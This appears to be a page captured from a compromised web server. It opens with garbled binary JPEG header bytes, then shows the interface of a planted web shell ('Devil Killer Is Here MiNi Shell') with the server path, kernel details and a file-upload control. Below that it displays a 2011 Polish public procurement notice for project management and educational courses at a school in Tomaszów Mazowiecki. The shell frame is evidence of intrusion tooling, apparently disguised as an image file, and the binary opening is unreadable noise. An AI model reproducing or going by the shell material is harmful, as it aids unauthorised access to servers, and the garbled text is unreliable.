JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20111007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20111007/325236-N-2011.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Realizacja usług zarządzania i usług edukacyjnych w projekcie pn.: Szansa na przyszłość, realizowanym przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Mazowieckim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX- Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, na podstawie umowy nr UDA-POKL.09.02.00-10-015 11-00</b><br>
<b>Numer ogłoszenia: 325236 - 2011; data zamieszczenia: 07.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 2 im. St. Staszica w Tomaszowie Maz. , ul. Św. Antoniego 57/61, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 43 36, faks 44 724 43 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsp2.nasztomaszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usług zarządzania i usług edukacyjnych w projekcie pn.: Szansa na przyszłość, realizowanym przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Mazowieckim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX- Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, na podstawie umowy nr UDA-POKL.09.02.00-10-015 11-00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usług zarządzania i usług edukacyjnych w projekcie pn.: Szansa na przyszłość realizowanym przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Mazowieckim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX- Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego na podstawie umowy nr UDA-POKL.09.02.00-10-015 11-00
Szczegółowy opis przedmiotu zamówienia: Zamówienie składa się z dwóch  zadań opisanych poniżej:
Zadanie nr 1: Zarządzanie projektem
Zadanie 2. Usługi edukacyjne
Zadanie Nr 1
Zarządzanie projektem
Zakres obowiązków podmiotu zarządzającego projektem Szansa na przyszłość realizowanym przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Maz.
Do obowiązków podmiotu zarządzającego należeć będzie:
a)	opracowanie planu realizacji projektu,
b)	opracowanie wzorów dokumentów i list kontrolnych,
c)	opracowanie zasad przepływu informacji i dokumentacji projektowej, 
d)	nadzór nad postępem finansowym  i rzeczowym realizacji projektu,
e)	monitoring kwalifikowalności kosztów w projekcie,
f)	opracowanie listy ryzyk i zarządzanie ryzykiem w projekcie,
g)	nadzorowanie formalnej obsługi uczestników projektu,
h)	formalna obsługa projektu,
i)	obsługa organizacyjna projektu,
j)	opracowanie wniosków o płatność zgodnie z obowiązującym harmonogramem płatności oraz nadzorowanie realizacji płatności w ramach projektu, 
k)	zarządzanie zespołem projektowym ,
l)	koordynacja obsługi organizacyjnej procesu realizacji szkoleń,
m)	koordynacja działań promocyjnych w projekcie,
n)	monitoring działań rekrutacyjnych w projekcie,
o)	monitoring wsparcia w projekcie,
p)	prowadzenie dokumentacji finansowej i sprawozdawczości, w tym opis i weryfikacja dokumentów finansowych i procesu rozliczeń z Instytucją Pośredniczącą - zgodnie z harmonogramem płatności,
q)	realizacja spotkań monitorujących postęp projektu spotkania z zespołem projektowym,
r)	monitoring dokumentacji projektowej
s)	doradztwo w zakresie realizacji działań w projekcie,
t)	kontakty robocze z Instytucją Pośredniczącą i z opiekunem projektu,
u)	prowadzenie i archiwizacja dokumentacji projektowej,
v)	wprowadzanie zmian do wniosku o dofinansowanie,
w)	przeprowadzenie szkolenia z zakresu równości płci w obszarze projektu.

Kluczowe decyzje dotyczące projektu (zmiany merytoryczne) podejmowane będą przez podmiot zarządzający w porozumieniu z dyrektorem szkoły oraz organem prowadzącym

 Zadanie Nr 2
Usługi edukacyjne
Zakres obowiązków podmiotu świadczącego usługi edukacyjne Szansa na przyszłość realizowanym przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Maz.
Do obowiązków podmiotu świadczącego usługi edukacyjne należeć będzie zapewnienie realizacji zajęć zgodnie z harmonogramem zawartym we wniosku o dofinansowanie w tym:
1.Zapewnienie doświadczonej kadry pedagogicznej do prowadzenia zajęć rozwijających kompetencje kluczowe, komunikacji biznesowej w języku angielskim i języku niemieckim, wyrównujących szanse edukacyjne oraz organizacji i wspomagania kształcenia modułowego w okresie realizacji projektu zgodnie z harmonogramem, w tym zajęcia:
a.	z języka angielskiego w biznesie - 2 grupy po 30 dni-2 godziny dziennie-12 uczniów w grupie,
b.	z języka niemieckiego w biznesie - 2 grupy po 30 dni-2 godziny dziennie-12 uczniów w grupie,
c.	z matematyki - poziom rozszerzony - 2 grupy po 36 dni-2 godziny dziennie-15 uczniów w grupie,
d.	w zakresie obsługi programu CHART - oprogramowania do zarządzania dla hoteli - 6 grup po 30 tygodni-2 godziny dziennie-15 uczniów w grupie,
e.	wyrównawcze z języka angielskiego - 4 grupy po 30 dni-2 godziny dziennie-15 uczniów w grupie,
f.	wyrównawcze z języka niemieckiego - 2 grupy po 30 dni-2 godziny dziennie15 uczniów w grupie
g.	wyrównawcze z matematyki - 6 grup po 30 dni 2 godziny dziennie15 uczniów w grupie,
h.	w zakresie obsługi pakietu programu INSERT- oprogramowania do obsługi finansowo-księgowej i kadrowej jednostek gospodarczych - 4 grupy po 30 dni 2 godziny dziennie15 uczniów w grupie,
2. Zapewnienie nadzorowania modyfikacji pakietów edukacyjnych przez doświadczonego eksperta kształcenia modułowego posiadającego kwalifikacje dydaktyczne i niezbędną wiedzę z zakresu kształcenia modułowego.
3.Zapewnienie wykonania w terminie modyfikacji pakietów edukacyjnych 
4.Zapewnienie opracowania szczegółowych programów zajęć zgodnie z treściami ramowymi zawartymi we wniosku o dofinansowanie:
Język angielski i niemiecki w biznesie
Ramowy program zajęć rozwijających kompetencje kluczowe z języka niemieckiego/angielskiego jako języka biznesowego dla kursu o wymiarze 60 godz.
a.	informacje o działalności gospodarczej w krajach niemieckiego angielskiego obszaru językowego. 4 godz.
b.	kreowanie wizerunku firmy.10godz. 
c.	aplikowanie o pracę. 12 godz.
d.	prowadzenie nowoczesnej korespondencji handlowej. 12 godz. 
e.	organizacja i przebieg negocjacji, dyskusji, zebrań. 12 godz.
f.	prowadzenie rozmów telefonicznych. 10 godz.

Matematyka - poziom  rozszerzony
Ramowy program zajęć dodatkowych z matematyki dla kursu o wymiarze 72 godz.
a.	wykorzystanie i tworzenie informacji: - umiejętność używania języka matematycznego do opisu rozumowania i uzyskanych wyników - 12 godzin,
b.	wykorzystanie i interpretowanie reprezentacji: - umiejętność interpretowania pojęć matematycznych i operowania obiektami matematycznymi - 12 godzin.
c.	modelowanie matematyczne: - umiejętność budowania modelu matematycznego danej sytuacji z uwzględnieniem ograniczeń i zastrzeżeń - 20 godzin.
d.	użycie i tworzenie strategii: - umiejętność tworzenia strategii rozwiązującej problem - 20 godzin.
e.	rozumowanie i argumentacja: - umiejętność tworzenia łańcucha argumentów i uzasadniania jego poprawności - 8 godzin.

Obsługa programu CHART - oprogramowania do zarządzania dla hoteli
Program kursu o wymiarze 60 godzin zgodnie z funkcjami właściwymi dla programu.

Język angielski i język niemiecki - zajęcia wyrównujące szanse edukacyjne
Ramowy program zajęć wyrównawczych z języka niemieckiego i języka angielskiego dla kursu o wymiarze 60 godz.
Kształtowanie kompetencji komunikacyjnych słuchaczy w zakresie kręgów tematycznych określonych w standardach wymagań egzaminacyjnych będących podstawą przeprowadzania egzaminu maturalnego.
a.	człowiek - dane personalne, wygląd zewnętrzny, cechy charakteru, uczucia i emocje. 4 godz.
b.	dom - miejsce zamieszkania, opis domu, pomieszczeń domu i ich wyposażenia, wynajmowanie mieszkania, 4 godz.                                                                                                                                                                              c. szkoła - przedmioty nauczania, oceny i wymagania, życie szkoły, kształcenie pozaszkolne. 4 godz.
     d. praca - popularne zawody i związane z nimi czynności, warunki pracy i zatrudnienia, praca     dorywcza. 4 godz.
e. życie rodzinne i towarzyskie - okresy życia, członkowie rodziny, czynności życia codziennego, formy spędzania czasu wolnego, święta i uroczystości, styl życia. 4 godz.
f.  żywienie - artykuły spożywcze, przygotowanie potraw, posiłki, lokale gastronomiczne. 4 godz.
g. zakupy i usługi - rodzaje sklepów, towary, sprzedawanie i kupowanie, reklama, korzystanie z usług. 4 godz.
           h. podróżowanie i turystyka - środki transportu, baza noclegowa, informacja turystyczna, wycieczki, zwiedzanie, wypadki i awarie. 4 godz.
i.	kultura - podstawowe dziedziny kultury, twórcy i ich dzieła, uczestnictwo w kulturze. 4 godz.
j.	sport - popularne dyscypliny sportu, podstawowy sprzęt sportowy, imprezy sportowe. 4 godz.
k.	zdrowie - higieniczny tryb życia, podstawowe schorzenia, ich objawy i leczenie, niepełnosprawni, uzależnienia. 4 godz.
l.	nauka, technika - odkrycia naukowe, wynalazki, obsługa i korzystanie z podstawowych urządzeń technicznych. 4 godz.
m.	świat przyrody - klimat, świat roślin i zwierząt, krajobraz, zagrożenie i ochrona środowiska naturalnego, klęski żywiołowe. 4 godz.
n.	państwo i społeczeństwo - struktura państwa, urzędy, organizacje międzynarodowe, konflikty wewnętrzne i międzynarodowe, przestępczość. 4 godz.
o.	elementy wiedzy o krajach niemieckiego angielskiego obszaru językowego. 4 godz

Matematyka - zajęcia wyrównujące szanse edukacyjne z matematyki
Ramowy program zajęć wyrównawczych matematyki dla kursu o wymiarze 60 godz.
a.	Wykorzystanie i tworzenie informacji: - umiejętność interpretowani a tekstu matematycznego i formułowania uzyskanych wyników - 16 godzin,                                                                                              b. Wykorzystanie i interpretowanie reprezentacji: - umiejętność używania prostych, dobrze znanych obiektów matematycznych -16 godzin.
c.	Modelowanie matematyczne: - umiejętność dobierania modelu matematycznego do prostej sytuacji - 12 godzin.
d.	Użycie i tworzenie strategii: - umiejętność stosowania strategii, która jasno wynika z treści zadania - 8 godzin.
e.	Rozumowanie i argumentacja: - umiejętność prowadzenia prostego rozumowania, składającego się z niewielkiej liczby kroków - 8 godzin

Wspomaganie modułowego programu kształcenia
Ramowy program zajęć modułowych z zakresu obsługi pakietu programu INSERT dla kursu o wymiarze 60 godz.
a)	Rachmistrz GT moduł do obsługi finansowo - księgowej przedsiębiorstw prowadzących uproszczoną ewidencję księgową,
b)	SUBIEKT GT moduł do obsługi gospodarki magazynowej i sprzedaży w przedsiębiorstwach produkcyjnych, handlowych i usługowych, 
c)	GRATYFIKANT GT moduł do obsługi kadr i płac i sprzedaży w przedsiębiorstwach produkcyjnych, handlowych i usługowych, 
d)	REWIZOR GT moduł do obsługi finansowo - księgowej przedsiębiorstw prowadzących pełną ewidencję księgową. 
5	Zapewnienie opracowanie planów wynikowych do realizowanych programów,
6	Opracowanie narzędzi pomiaru dydaktycznego: testy, karty pracy, ćwiczenia,
7	Koordynowanie prowadzenia dokumentacji przebiegu kształcenia,
8	Systematyczne monitorowanie postępów uczniów oraz zapewnienie ewaluacji procesu kształcenia
9	Koordynowanie dostosowania procesu kształcenia do potrzeb i możliwości uczniów
10	Zapewnienie prowadzenia zajęć dydaktycznych zgodnie z harmonogramem,
11	Zapewnienie realizacji treści programowych zawartych w szczegółowym programie zajęć,
12	Zapewnienie przestrzegania przez prowadzących regulaminów i zasad obowiązujących w miejscu realizacji projektu, ze szczególnym uwzględnieniem regulaminu pracy w tym przepisów bezpieczeństwa i higieny pracy oraz p-poż i zapisów kodeksu etycznego nauczyciela w Zespole Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Maz.
13	Koordynowanie pracy zespołu nauczycieli prowadzących zajęcia dydaktyczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, wówczas gdy Wykonawca wykaże, że przeprowadził szkolenia edukacyjne w liczbie godzin min. 400  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie oraz wykaże, że uczestniczył w realizacji co najmniej jednego projektu współfinansowanego ze środków Unii Europejskiej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) (dotyczy zadania Nr1):
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że spełnia niżej wymienione warunki udziału:
Lp.	Warunek udziału
1	Minimum 2 letnie doświadczenie personelu w realizacji usług sprawozdawczości i zarządzania.
2	Dysponuje osobami, które  współpracowały  z jednostkami samorządu terytorialnego w zakresie organizowania szkoleń w ramach projektów UE.
3	Personel biorący udział w wykonywaniu zamówienia musi posiadać certyfikaty potwierdzające kompetencje w zarządzaniu projektami miękkimi: 
a)	Ukończone szkolenia w zakresie praktycznego zarządzania i rozliczania projektów EFS
b)	Udokumentowana znajomość metodyki zarządzania projektami (metodyki PMI lub równoważnej) - przynajmniej jeden członek zespołu
4	Dysponuje osobami , które posiadają minimum  6-miesięczne doświadczenie we współpracy z zagraniczną instytucją edukacyjną z kraju UE.
5	Zapewnienie 2-osobowego zespołu do realizacji usługi zarządzania, który posiada następujące kwalifikacje:
a)	minimum dwuletnia praktyka przynajmniej jednego członka zespołu w zarządzaniu w branży edukacyjnej (np. zarząd, właściciel firmy)
6	b)	doświadczenie przynajmniej jednego członka zespołu w zarządzaniu projektami EFS (min. 1 projekt) 
7	c)	doświadczenie zespołu w realizacji łącznie minimum 1 projektu EFS, w przynajmniej następującym zakresie: rozliczanie, prowadzenie dokumentacji projektowej,  sprawozdawczość;
8	d)	ukończone studia magisterskie w zakresie zarządzania przynajmniej przez jednego członka zespołu 
9	e)	ukończone studia podyplomowe w zakresie funduszy strukturalnych przynajmniej przez jednego członka zespołu
10	f)	minimum 8-letnie doświadczenie przynajmniej jednego członka zespołu personelu wykonawcy w branży edukacyjnej

b) (dotyczy zadania Nr 2):
Lp.	Warunek udziału
1	Minimum roczne doświadczenie wykonawcy w realizacji usług szkoleniowych
2	Przynajmniej 5 trenerów posiadających przygotowanie pedagogiczne
3	Minimum jeden ekspert w zakresie kształcenia modułowego
4.	Przynajmniej 8 letnie doświadczenie w branży edukacyjnej osoby odpowiedzialnej ze strony wykonawcy za koordynowanie  usług i współpracę z zamawiającym  
5.	Dysponuje osobami, które  współpracowały  z jednostkami samorządu terytorialnego w zakresie realizacji szkoleń w ramach projektów UE.
6.	Trenerzy biorący udział w wykonywaniu zamówienia muszą być nauczycielami dyplomowanymi lub mianowanymi (poza szkoleniami komputerowymi ), a ekspert kształcenia modułowego musi być autorem minimum jednego pakietu edukacyjnego;

7.	Trenerzy biorący udział w wykonywaniu zamówienia muszą być nauczycielami czynnymi zawodowo.
8.	Trenerzy kształcenia zawodowego muszą mieć doświadczenie w pracy nauczyciela przedmiotów zawodowych lub kształcenia modułowego potwierdzone zrealizowaniem przynajmniej 200 godzin w ramach konkretnego przedmiotu, modułu (na podstawie oświadczenia) w szkole ponadgimnazjalnej kończącej się egzaminem maturalnym
9.	Trenerzy kształcenia ogólnego muszą mieć przynajmniej 6 letnie doświadczenie w pracy nauczyciela odpowiednich przedmiotów ogólnokształcących (j. angielski, matematyka, język niemiecki, technologia informacyjna lub informatyka lub przedmiotów, których treści programowe realizowane są w oparciu o technologie informacyjną) potwierdzone  zrealizowaniem przynajmniej 200 godzin w ramach konkretnego przedmiotu (na podstawie oświadczenia) w szkole ponadgimnazjalnej kończącej się egzaminem maturalnym</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
2.   Na mocy ustawy Prawo zamówień publicznych zakazuje się istotnych zmian postanowień zawartej umowy (art. 144 ust. 1 Prawa zamówień publicznych) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zamawiający przewidział możliwość  dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
3.	Zmiana umowy dokonana z naruszeniem art. 144 ust.1 ustawy Prawo zamówień publicznych jest nieważna. 
4. Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach
1) dopuszczonej prawem zmian stron umowy lub oznaczenia stron umowy,
2) zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3) zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa,
4) wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsp2.nasztomaszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych Nr 2 im. St. Staszica, 97-200 Tomaszów Maz. ul. Św. Antoniego 57,61    pokój nr 1.2. I piętro Sekretariat, budynek A.</p>
